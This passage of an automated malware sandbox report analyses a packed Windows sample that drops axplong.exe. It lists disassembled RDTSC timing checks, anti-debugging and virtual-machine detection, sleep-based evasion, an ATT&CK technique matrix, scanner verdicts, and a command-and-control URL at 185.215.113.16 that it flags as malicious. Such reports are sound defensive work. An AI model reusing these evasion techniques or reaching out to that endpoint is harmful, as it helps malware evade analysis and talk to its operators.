                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380292 second address: 5380296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380296 second address: 538029A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538029A second address: 5380305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD648BC9AD2h 0x00000010 sub eax, 4181B8E8h 0x00000016 jmp 00007FD648BC9ACBh 0x0000001b popfd 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD648BC9ACBh 0x00000026 jmp 00007FD648BC9AD3h 0x0000002b popfd 0x0000002c mov di, cx 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD648BC9AD1h 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330063 second address: 5330069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330069 second address: 5330096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD648BC9AD7h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330096 second address: 53300B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B458h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov esi, 7598C707h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53300B9 second address: 5330106 instructions: 0x00000000 rdtsc 0x00000002 mov ax, CCA3h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d mov di, si 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov ax, 76EFh 0x00000018 pushfd 0x00000019 jmp 00007FD648BC9AD4h 0x0000001e and ax, D918h 0x00000023 jmp 00007FD648BC9ACBh 0x00000028 popfd 0x00000029 popad 0x0000002a and esp, FFFFFFF8h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov eax, edi 0x00000032 mov edx, 7863D292h 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330106 second address: 533013B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B458h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov esi, 1CEB90FDh 0x00000010 mov ecx, 3AE53FF9h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov eax, 49432197h 0x0000001f mov edx, eax 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533013B second address: 5330163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b jmp 00007FD648BC9ACDh 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD648BC9ACDh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330163 second address: 53301D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD648C0B457h 0x00000009 and cl, FFFFFFAEh 0x0000000c jmp 00007FD648C0B459h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FD648C0B450h 0x00000018 xor cx, E428h 0x0000001d jmp 00007FD648C0B44Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD648C0B454h 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53301D7 second address: 5330227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD648BC9AD9h 0x00000011 mov ebx, dword ptr [ebp+10h] 0x00000014 jmp 00007FD648BC9ACEh 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD648BC9AD7h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330227 second address: 5330298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FD648C0B44Bh 0x0000000b or ecx, 43EC4D8Eh 0x00000011 jmp 00007FD648C0B459h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FD648C0B451h 0x00000020 xchg eax, esi 0x00000021 jmp 00007FD648C0B44Eh 0x00000026 mov esi, dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD648C0B457h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330298 second address: 533029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533029E second address: 53302C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD648C0B455h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302C7 second address: 53302CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302CD second address: 53302D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53302D1 second address: 5330332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD648BC9AD9h 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ch, dh 0x00000017 pushfd 0x00000018 jmp 00007FD648BC9AD4h 0x0000001d add eax, 39D0CBE8h 0x00000023 jmp 00007FD648BC9ACBh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330332 second address: 5330362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 jmp 00007FD648C0B450h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 mov ebx, ecx 0x00000012 mov di, si 0x00000015 popad 0x00000016 je 00007FD6BA809708h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop eax 0x00000021 movsx ebx, cx 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330362 second address: 5330368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330368 second address: 533036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533036C second address: 5330399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD648BC9ACDh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5330399 second address: 53303A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B44Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303A9 second address: 53303AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303AD second address: 53303C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD6BA8096BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD648C0B44Ah 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303C7 second address: 53303CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53303CD second address: 53303D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F3EAE1 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F3EBC7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 117CF8F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: B8EAE1 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: B8EBC7 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: DCCF8F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_053A00B6 rdtsc 0_2_053A00B6
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1092Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 395Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1186Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1213Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1199Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3872Thread sleep time: -56028s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2076Thread sleep count: 1092 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2076Thread sleep time: -2185092s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4308Thread sleep count: 395 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4308Thread sleep time: -11850000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2492Thread sleep time: -540000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1004Thread sleep count: 1186 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1004Thread sleep time: -2373186s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5716Thread sleep count: 1213 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5716Thread sleep time: -2427213s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5300Thread sleep count: 1199 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5300Thread sleep time: -2399199s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5300Thread sleep count: 147 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5300Thread sleep time: -294147s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000006.00000002.2995896267.0000000001386000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: file.exe, 00000000.00000003.1758359905.0000000001620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: axplong.exe, 00000006.00000002.2995896267.00000000013C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1783920297.00000000010CD000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1813170144.0000000000D1D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1813562303.0000000000D1D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_053C0B79 Start: 053C0C18 End: 053C0BB86_2_053C0B79
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_053A00B6 rdtsc 0_2_053A00B6
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B5645B mov eax, dword ptr fs:[00000030h]6_2_00B5645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B5A1C2 mov eax, dword ptr fs:[00000030h]6_2_00B5A1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: 9Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B3D312 cpuid 6_2_00B3D312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00B3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00B3CB1A

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 1.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.ed0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1812692273.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1772376419.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1742866019.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1813406382.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2324708370.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1771741523.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1783849265.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory741
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe53%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe53%ReversingLabsWin32.Packed.Themida
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.16/Jo89Ku7d/index.php100%URL Reputationphishing
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    241.42.69.40.in-addr.arpa
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.phptrue
                      • URL Reputation: phishing
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.php.axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpmaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                          unknown
                          http://185.215.113.16/Jo89Ku7d/index.php4079-b30a-7368302a1ad4LMEMpaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            http://185.215.113.16/Jo89Ku7d/index.phpjaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              http://185.215.113.16/Jo89Ku7d/index.php)axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                unknown
                                http://185.215.113.16/Jo89Ku7d/index.phpIaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                  unknown
                                  http://185.215.113.16/Jo89Ku7d/index.phpiaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                    unknown
                                    http://185.215.113.16/Jo89Ku7d/index.phpdaxplong.exe, 00000006.00000002.2995896267.0000000001357000.00000004.00000020.00020000.00000000.sdmptrue
                                      unknown
                                      http://185.215.113.16/Jo89Ku7d/index.phpncodedBBaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                        unknown
                                        http://185.215.113.16/Jo89Ku7d/index.phpaaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                          unknown
                                          http://185.215.113.16/Jo89Ku7d/index.php?axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                            unknown
                                            http://185.215.113.16/Jo89Ku7d/index.php=axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                              unknown
                                              http://185.215.113.16/Jo89Ku7d/index.php6Baxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                unknown
                                                http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                  unknown
                                                  http://185.215.113.16/Jo89Ku7d/index.phpyBaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                    unknown
                                                    http://185.215.113.16/Jo89Ku7d/index.phpwaxplong.exe, 00000006.00000002.2995896267.0000000001386000.00000004.00000020.00020000.00000000.sdmptrue
                                                      unknown
                                                      http://185.215.113.16/Jo89Ku7d/index.phpuaxplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                        unknown
